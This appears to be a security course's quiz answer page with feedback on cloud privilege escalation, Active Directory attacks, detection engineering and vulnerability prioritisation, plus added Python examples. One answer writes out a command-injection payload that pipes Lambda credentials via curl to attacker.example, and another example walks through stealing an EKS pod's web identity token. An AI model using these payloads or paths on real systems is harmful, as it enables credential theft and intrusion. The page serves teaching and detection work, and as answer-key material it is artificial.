1. Shodan was launched by John Matherly in which year?
Correct. Shodan launched in 2009. It indexes internet-connected devices by banner and response data, enabling searches for specific services, versions, and — since its vuln search feature was added — specific CVEs.
Shodan was launched in 2009 by John Matherly. It became the standard external attack surface visibility tool for both offensive and defensive security work.
2. A Lambda function processes SQS messages with code: os.system("processor --id=" + event['orderId']). The function's execution role has s3:GetObject on a sensitive bucket. An attacker can send SQS messages. What is the impact?
Correct. The orderId value from the SQS message is concatenated into a shell command and handed to os.system(), which runs it through /bin/sh. An attacker-controlled message whose orderId is something like "1042; env | curl -s -X POST --data-binary @- http://attacker.example/" terminates the intended command and runs the attacker's, which ships the execution environment (including AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN for the execution role) to the attacker. Those temporary credentials carry every permission of the Lambda role, including s3:GetObject on the sensitive bucket, and can be used from the attacker's own machine. The AWS CLI is not part of the standard Lambda runtimes, so an injected command usually exfiltrates the credentials (or uses the runtime's own boto3) rather than calling aws s3 cp in place. The fix is to validate orderId against its expected format and invoke processor through subprocess.run with an argv list, never through a shell.
Not correct. AWS does not sanitize SQS message contents before delivery. The orderId value is used directly in os.system(), creating an OS command injection vulnerability that executes with the Lambda function's IAM permissions.
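As an added example (not code from the quiz or the course), the same handler in two forms: the vulnerable string concatenation from the question and a hardened version using an argv list plus input validation. A constructed SQS event is embedded, and echo stands in for the hypothetical processor binary so the block runs offline; the payload uses echo INJECTED in place of a real exfiltration command.

```python
import json
import re
import subprocess

# Constructed SQS records (not real AWS traffic). The second carries the
# injection payload: a shell metacharacter followed by an attacker command.
BENIGN_RECORD = {"body": json.dumps({"orderId": "1042"})}
MALICIOUS_RECORD = {"body": json.dumps({"orderId": "1042; echo INJECTED"})}

# Stand-in for the hypothetical 'processor' binary so the example runs
# offline: it simply echoes its arguments back.
PROCESSOR = "echo processor"

# Assumed format of a legitimate orderId: a short run of digits.
ORDER_ID_RE = re.compile(r"[0-9]{1,12}")


def vulnerable_handler(event):
    """Mirrors the quiz code: orderId is concatenated into a shell string.

    os.system() hands the string to /bin/sh, so ';', '|', '$(...)' in the
    message body are interpreted by the shell. subprocess.run(shell=True) is
    used here instead of os.system() only so the output can be captured.
    """
    outputs = []
    for record in event["Records"]:
        order_id = json.loads(record["body"])["orderId"]
        cmd = PROCESSOR + " --id=" + order_id
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        outputs.append(result.stdout)
    return outputs


def argv_only_handler(event):
    """No validation, but no shell either: the orderId becomes one argv
    element, so the payload survives only as a literal argument string."""
    outputs = []
    for record in event["Records"]:
        order_id = json.loads(record["body"])["orderId"]
        argv = PROCESSOR.split() + ["--id=" + order_id]
        result = subprocess.run(argv, capture_output=True, text=True)
        outputs.append(result.stdout)
    return outputs


def hardened_handler(event):
    """Both fixes: reject anything that is not a well-formed orderId, and
    invoke the program with an argv list so no shell is ever involved."""
    outputs = []
    for record in event["Records"]:
        order_id = json.loads(record["body"])["orderId"]
        if not ORDER_ID_RE.fullmatch(order_id):
            raise ValueError("rejected orderId: %r" % order_id)
        argv = PROCESSOR.split() + ["--id=" + order_id]
        result = subprocess.run(argv, capture_output=True, text=True)
        outputs.append(result.stdout)
    return outputs


def is_rejected(handler, event):
    """True if the handler refuses the event with ValueError."""
    try:
        handler(event)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    event = {"Records": [BENIGN_RECORD, MALICIOUS_RECORD]}
    print("vulnerable:", vulnerable_handler(event))   # second output contains INJECTED
    print("argv only :", argv_only_handler(event))    # payload printed literally
    print("hardened  :", is_rejected(hardened_handler, event))  # True
```

The argv form alone stops the shell injection; the validation step additionally keeps malformed values away from the downstream program, which may have its own parsing bugs.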
3. Which component of a Sigma rule is most critical for preventing alert fatigue and SOC rule suppression?
Correct. Underdeveloped false positive documentation leads to high false positive rates and SOC fatigue, which ultimately results in rules being suppressed or disabled entirely — eliminating the detection coverage they were meant to provide.
The falsepositives section is the most commonly neglected and most operationally consequential component — it determines whether the rule is usable in production.
4. An AI-generated verification testing script confirms remediation by:
Correct. Technical verification goes beyond "was a change made" to "does the change actually prevent exploitation" — replaying the original payload and its variations to confirm the condition is resolved, not just patched over.
Incorrect. Verification scripts technically confirm the exploit no longer works — not that a patch was applied. The distinction between attestation (claiming it's fixed) and verification (proving it's fixed) is the core principle.
5. In the four-component detection engineering feedback cycle, what happens at the "coverage gap analysis" step?
Correct. Coverage gap analysis is the audit step: comparing what the attacker did (and what artifacts it left) against what detection rules currently exist. The output is a prioritized gap list — the detection engineering work queue.
Coverage gap analysis is the audit between artifact documentation and rule authoring — determining which artifacts have no current detection rule.
6. What is the core structural problem with using raw CVSS base scores to prioritise a large vulnerability list?
Correct. CVSS base scores are context-blind by design: they rate the vulnerability's intrinsic characteristics, not the risk it poses in a specific environment (exposure, asset criticality, compensating controls, whether a working exploit exists). The Temporal and Environmental metric groups exist to add that context, but scanner output almost always carries only the base score. AI prioritisation layers add the missing context.
Incorrect. Review Lesson 1: the core issue is context-blindness, not calculation errors.
7. What is the primary advantage of the Sigma rule format for detection engineering?
Correct. Write-once, deploy-everywhere is Sigma's core value: a rule is written once in Sigma's YAML format and compiled into native queries by SigmaHQ's converter tooling (sigma-cli with pySigma backends) for the major SIEM and EDR query languages.
Sigma's primary value is platform agnosticism — one rule definition compiles to native queries for any supported SIEM.
8. In EKS with OIDC workload identity, what allows a compromised pod to obtain cloud credentials?
Correct. EKS OIDC workload identity (IAM Roles for Service Accounts) works by projecting a service account token into the pod and setting AWS_WEB_IDENTITY_TOKEN_FILE and AWS_ROLE_ARN in its environment. The pod calls STS AssumeRoleWithWebIdentity with that token and receives temporary credentials for the IAM role named in the service account's eks.amazonaws.com/role-arn annotation, whose trust policy accepts the cluster's OIDC provider. No EC2 instance profile is involved, so code execution or an arbitrary file read inside the pod is enough to obtain the role's credentials and use them from anywhere until the token expires.
Not correct. OIDC workload identity uses a projected service account token and AWS_WEB_IDENTITY_TOKEN_FILE to let the pod call sts:AssumeRoleWithWebIdentity, obtaining credentials for the IAM role bound to its Kubernetes service account.
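Added example, not part of the original page: what a compromised pod can learn from its environment and the projected token, and the STS call that turns the token into credentials. The environment variables, role ARN, cluster issuer URL and token are constructed for the example; the token's signature is a placeholder because only STS verifies it, and the STS call itself is only prepared, not made.

```python
import base64
import json
import time

# Constructed environment of a pod whose service account is annotated with
# eks.amazonaws.com/role-arn. Account ID, role name and paths are assumptions.
FAKE_ENV = {
    "AWS_ROLE_ARN": "arn:aws:iam::123456789012:role/orders-reader",
    "AWS_WEB_IDENTITY_TOKEN_FILE": "/var/run/secrets/eks.amazonaws.com/serviceaccount/token",
    "AWS_REGION": "us-east-1",
}


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def make_projected_token(namespace, service_account, audience="sts.amazonaws.com",
                         lifetime=86400, now=None):
    """Builds a JWT with the claim layout of a projected service account token.
    The signature is a placeholder: the pod never validates it; STS does,
    against the keys published by the cluster's OIDC issuer (constructed URL)."""
    now = int(time.time()) if now is None else now
    header = {"alg": "RS256", "kid": "constructed", "typ": "JWT"}
    claims = {
        "iss": "https://oidc.eks.us-east-1.amazonaws.com/id/EXAMPLECLUSTERID",
        "sub": "system:serviceaccount:%s:%s" % (namespace, service_account),
        "aud": [audience],
        "exp": now + lifetime,
        "iat": now,
        "kubernetes.io": {
            "namespace": namespace,
            "serviceaccount": {"name": service_account,
                               "uid": "00000000-0000-0000-0000-000000000000"},
        },
    }
    return ".".join([_b64url(json.dumps(header).encode()),
                     _b64url(json.dumps(claims).encode()),
                     _b64url(b"placeholder-signature")])


def decode_claims(token):
    """Decodes the payload segment without verifying the signature, which is
    all an attacker in the pod needs to learn what the token is good for."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def describe_workload_identity(env, read_file, now=None):
    """What a compromised pod learns from its environment plus the mounted
    token: which IAM role it may assume, as which Kubernetes identity, and
    for how long the token stays exchangeable."""
    token = read_file(env["AWS_WEB_IDENTITY_TOKEN_FILE"])
    claims = decode_claims(token)
    now = int(time.time()) if now is None else now
    return {
        "role_arn": env["AWS_ROLE_ARN"],
        "service_account": claims["sub"],
        "audience": claims["aud"],
        "seconds_left": claims["exp"] - now,
        "token": token,
    }


def assume_role_params(env, token, session_name="stolen-token"):
    """Keyword arguments for boto3's sts.assume_role_with_web_identity(). The
    call is not made here because it needs a real STS endpoint; with a real
    token it returns AccessKeyId/SecretAccessKey/SessionToken for the role."""
    return {"RoleArn": env["AWS_ROLE_ARN"], "RoleSessionName": session_name,
            "WebIdentityToken": token}


if __name__ == "__main__":
    # A dict stands in for the pod filesystem (constructed).
    fake_fs = {FAKE_ENV["AWS_WEB_IDENTITY_TOKEN_FILE"]:
               make_projected_token("orders", "orders-api")}
    info = describe_workload_identity(FAKE_ENV, fake_fs.__getitem__)
    print(info["service_account"], "->", info["role_arn"],
          "(%ds left)" % info["seconds_left"])
    print(assume_role_params(FAKE_ENV, info["token"]))
```

The defensive reading of the same facts: the token file is readable by any process in the pod, so file-read bugs are credential-theft bugs, and the trust policy's Condition on the token's sub claim is what keeps one namespace's pods from assuming another namespace's role.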
9. What is the gold standard method for validating that a newly written detection rule will actually fire under attacker conditions?
Correct. Replay testing is the only way to confirm a rule fires on real artifacts rather than hypothetical signals. Atomic Red Team provides the standardized execution scripts for this validation step.
Logic review and syntax validation are necessary but insufficient. Only replay testing against real technique execution confirms the rule fires on actual artifacts.
10. What key insight about the 2020 SolarWinds breach challenged standard CVSS-based vulnerability prioritization?
Correct. The intrusion chained a supply-chain foothold with Golden SAML (forging SAML assertions with a stolen AD FS token-signing key) and misconfigurations that each scored moderately in isolation, yet together formed a critical attack path. CVSS base score prioritization scores findings one at a time and therefore misses compound risk from chained findings.
Incorrect. The SolarWinds lesson is that chained lower-scored vulnerabilities produced the most dangerous attack path — CVSS base score prioritization fundamentally misses compound attack chain risk.
11. BloodHound stores its AD relationship graph data in which database technology?
Correct. BloodHound uses Neo4j. AD objects become nodes and relationships (ACLs, group memberships, sessions) become edges. Cypher queries traverse this graph to find attack paths.
Incorrect. Neo4j is the graph database that makes BloodHound's path-finding queries efficient. Its native graph storage and Cypher query language are specifically suited to AD relationship traversal.
12. What permission in Azure directly allows a principal to assign themselves the Owner role at subscription scope?
Correct. Microsoft.Authorization/roleAssignments/write is the Azure RBAC action that creates role assignments. A principal holding it at subscription scope can write a new assignment of Owner to its own object ID at that scope. Owner and User Access Administrator both include it, and so does any custom role that grants Microsoft.Authorization/*. When reviewing such a grant, check for role-assignment conditions, which can restrict which roles or principals the holder is allowed to assign.
Not correct. The relevant permission is Microsoft.Authorization/roleAssignments/write — the Azure RBAC action for creating role assignments, including self-assignment of Owner.
13. What GCP permission is equivalent to the AWS iam:PassRole + lambda:CreateFunction escalation path?
Correct. In GCP, iam.serviceAccounts.actAs is the equivalent of iam:PassRole — it allows specifying a service account for a resource to run as. Combined with cloudfunctions.functions.create or compute.instances.create, an attacker can create a workload that runs as a high-privilege service account, achieving the same compute-based escalation pattern as AWS.
Not correct. The GCP equivalent pattern is iam.serviceAccounts.actAs (the ability to assign a service account to a resource, equivalent to PassRole) combined with a resource creation permission like cloudfunctions.functions.create.
14. EPSS (Exploit Prediction Scoring System) expresses its output as which of the following?
Correct. EPSS outputs a probability between 0 and 1 that the CVE will see exploitation activity in the wild within the next 30 days, recomputed daily as new data arrives (a percentile rank is published alongside it). Combined with CVSS severity, it helps analysts distinguish vulnerabilities that are severe and likely to be exploited from those that are severe but theoretical.
Incorrect. Review the EPSS key term in Lesson 1.
15. What information can NOT typically be extracted from a raw SSH banner like "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7"?
Correct. Banner strings reveal the protocol version, the software name and version, and usually an OS or package hint. In this example the comment Debian-10+deb9u7 is the Debian package revision, which matters because Debian backports security fixes without changing the upstream 7.4p1 string, so the upstream version alone overstates what is unpatched. What a banner cannot reveal is runtime state such as the number of active sessions; that requires authenticated access.
Active session counts are runtime state data, not included in static banner strings. Review Lesson 1's banner anatomy section.
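Added example (not from the original page): a parser for the SSH identification string defined in RFC 4253, applied to the banner from the question and two constructed variants. It makes concrete what a banner carries (protocol, software, version, distribution package revision) and lists what it does not.

```python
import re

# The banner from the question plus two constructed variants.
SAMPLE_BANNERS = [
    "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7\r\n",
    "SSH-2.0-dropbear_2019.78\r\n",
    "SSH-2.0-Cisco-1.25\r\n",
]

# RFC 4253 section 4.2: SSH-protoversion-softwareversion SP comments CR LF.
# protoversion cannot contain '-'. softwareversion is taken up to the first
# space because some vendors (Cisco) put '-' inside it despite the RFC.
_IDENT_RE = re.compile(r"^SSH-(?P<proto>[^-\s]+)-(?P<software>\S+)(?: (?P<comments>.*))?$")

# Debian/Ubuntu comment convention: "<distro>-<package revision>".
_DEB_RE = re.compile(r"^(?P<distro>Debian|Ubuntu)-(?P<revision>\S+)$")

# Runtime facts that no banner can carry; they need an authenticated session.
RUNTIME_STATE_NOT_IN_BANNER = ("active session count", "logged-in users",
                               "uptime", "configured authentication methods")


def parse_ssh_banner(line):
    """Splits an identification string into its RFC 4253 fields and, where the
    software token follows the name_version convention, into name/version."""
    line = line.rstrip("\r\n")
    m = _IDENT_RE.match(line)
    if not m:
        raise ValueError("not an SSH identification string: %r" % line)
    software = m["software"]
    name, sep, version = software.partition("_")
    comments = m["comments"]
    result = {
        "protocol": m["proto"],
        "software": software,
        "name": name,
        "version": version if sep else None,   # Cisco-style strings have no '_'
        "comments": comments,
        "distro": None,
        "package_revision": None,
    }
    if comments:
        d = _DEB_RE.match(comments)
        if d:
            result["distro"] = d["distro"]
            # Backported fixes bump this revision, not the upstream version.
            result["package_revision"] = d["revision"]
    return result


if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(parse_ssh_banner(banner))
    print("not in any banner:", RUNTIME_STATE_NOT_IN_BANNER)
```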
16. Pass-the-Hash attacks are effective primarily because they exploit which characteristic of NTLM authentication?
Correct. In NTLM the NT hash is the secret: the NTLMv2 response is an HMAC-MD5 keyed by a value derived from the NT hash, computed over the server challenge and the client blob, so the cleartext password is never needed. Whoever holds the NT hash can compute a valid response and authenticate as that user, which is why Pass-the-Hash works without cracking anything.
Incorrect. NTLM hashes are not directly reversible. The key property is that the hash serves as the authentication credential itself.
17. An on-premises server is enrolled in AWS SSM via Hybrid Activations. A penetration tester holds ssm:SendCommand permission in AWS. The tester has no network route to the server. What is possible?
Correct. The SSM agent on the on-premises server polls the regional SSM endpoint over an outbound HTTPS connection it opened itself. SendCommand queues a document such as AWS-RunShellScript or AWS-RunPowerShellScript, and the agent fetches and executes it as root on Linux or SYSTEM on Windows. The tester never needs inbound access: every packet flows from the server out to AWS, and command output returns the same way. The IAM policy must allow ssm:SendCommand on both the document and the managed instance (the mi-... ARN of a hybrid-activated node), so check which targets the permission actually covers.
Not correct. The SSM agent maintains an outbound connection to AWS. ssm:SendCommand delivers commands through this outbound channel — no inbound network access to the server is needed. This is the key operational advantage for penetration testers.
18. How does a purple team exercise fundamentally differ from a traditional red team engagement?
Correct. The fundamental difference is transparency and objective. Purple teams are collaborative detection validation exercises; red teams are covert capability assessments. Both are valuable; they answer different questions.
The defining difference is operational mode (transparent vs. covert) and objective (rule validation vs. detection capability measurement).
19. DCSync generates which Windows event ID on the domain controller being queried?
Correct. DCSync asks a domain controller to replicate directory data, which is audited as Event 4662 (An operation was performed on an object) with AccessMask 0x100 (control access) and, in the Properties field, the replication extended-right GUIDs: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes), 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All) and 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set). A 4662 carrying these GUIDs where SubjectUserName is not a domain controller computer account (or a known sync account such as Azure AD Connect's MSOL_ account) is a high-fidelity signal. Note that 4662 has no source address field, so "from a non-DC IP" has to be established by joining SubjectLogonId to the matching 4624 logon event, and the event only appears if Directory Service Access auditing is enabled.
Incorrect. DCSync triggers Event 4662 (Directory Service Access) whose Properties field lists the replication extended-right GUIDs (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 and 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2). The standard SIEM rule alerts on 4662 with those GUIDs when the subject account is not a domain controller's computer account; the source IP is not in 4662 itself and must be joined from the corresponding 4624.
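Added example, not code from the original page: the 4662-based DCSync detection described above run over constructed sample events, with the DC computer-account allowlist and the Azure AD Connect account prefix as stated assumptions, and a join to 4624 to recover the source IP that 4662 lacks.

```python
import re

# Extended-right GUIDs that grant directory replication, i.e. what DCSync exercises.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL,
                     DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS: the AccessMask for extended rights

# Assumed for this example environment: the DC computer accounts and the
# Azure AD Connect account prefix that are expected to replicate.
DC_COMPUTER_ACCOUNTS = {"DC01$", "DC02$"}
SYNC_ACCOUNT_PREFIXES = ("MSOL_",)

_GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed sample events, shaped like the XML-to-dict fields of 4662/4624.
SAMPLE_EVENTS = [
    {   # routine DC-to-DC replication: expected, must not alert
        "EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
        "SubjectLogonId": "0x3e7", "AccessMask": "0x100",
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
        "Properties": "Control Access\r\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # a user account exercising both replication rights: DCSync
        "EventID": 4662, "SubjectUserName": "jsmith", "SubjectDomainName": "CORP",
        "SubjectLogonId": "0x5a1c3", "AccessMask": "0x100",
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
        "Properties": "Control Access\r\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                      "\r\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # same user, an unrelated control-access right (User-Change-Password): not replication
        "EventID": 4662, "SubjectUserName": "jsmith", "SubjectDomainName": "CORP",
        "SubjectLogonId": "0x5a1c3", "AccessMask": "0x100",
        "Properties": "Control Access\r\n\t{ab721a53-1e2f-11d0-9819-00aa0040529b}",
    },
    {   # the network logon that opened jsmith's session: the only place the IP lives
        "EventID": 4624, "TargetUserName": "jsmith", "TargetDomainName": "CORP",
        "TargetLogonId": "0x5a1c3", "LogonType": "3", "IpAddress": "10.20.30.40",
    },
]


def _replication_guids(properties):
    return {g.lower() for g in _GUID_RE.findall(properties)} & REPLICATION_GUIDS


def is_dcsync(event):
    """True for a 4662 that exercises a replication right from an account that is
    not an allowlisted replicator. An explicit DC allowlist is tighter than the
    common "name ends with $" exclusion, which would let a compromised machine
    account that had been granted replication rights slip through."""
    if event.get("EventID") != 4662:
        return False
    try:
        mask = int(event.get("AccessMask", "0"), 16)
    except ValueError:
        return False
    if not mask & CONTROL_ACCESS:
        return False
    if not _replication_guids(event.get("Properties", "")):
        return False
    user = event.get("SubjectUserName", "")
    return user not in DC_COMPUTER_ACCOUNTS and not user.startswith(SYNC_ACCOUNT_PREFIXES)


def detect_dcsync(events):
    """One alert per suspicious 4662. Because 4662 carries no network address,
    the source IP is recovered by joining SubjectLogonId to the TargetLogonId
    of the 4624 that created the session."""
    logon_ip = {e["TargetLogonId"]: e.get("IpAddress")
                for e in events if e.get("EventID") == 4624}
    alerts = []
    for e in events:
        if not is_dcsync(e):
            continue
        alerts.append({
            "user": "%s\\%s" % (e.get("SubjectDomainName", ""), e["SubjectUserName"]),
            "rights": sorted(_replication_guids(e["Properties"])),
            "logon_id": e.get("SubjectLogonId"),
            "source_ip": logon_ip.get(e.get("SubjectLogonId")),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS):
        print(alert)
```

Replay-test this the way the page recommends for any rule: run a DCSync (for example with an Atomic Red Team test) against a lab DC with Directory Service Access auditing enabled and confirm the alert fires with the expected account and source IP.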
20. Why does invalidating a Golden Ticket require the KRBTGT password to be reset TWICE?
Correct. Domain controllers keep both the current and the previous (n-1) KRBTGT key so that tickets issued just before a rotation keep working. A forged ticket encrypted with the old key is therefore still accepted after a single reset. Only after a second reset, performed once the first has replicated to every DC, is the key the attacker used gone from all domain controllers, invalidating every ticket minted with it.
Incorrect. The reason is technical: DCs retain the previous KRBTGT key alongside the current one, so Golden Tickets forged with it remain valid after one reset. A second reset, done after the first has replicated to all domain controllers, removes that key everywhere and invalidates the forged tickets.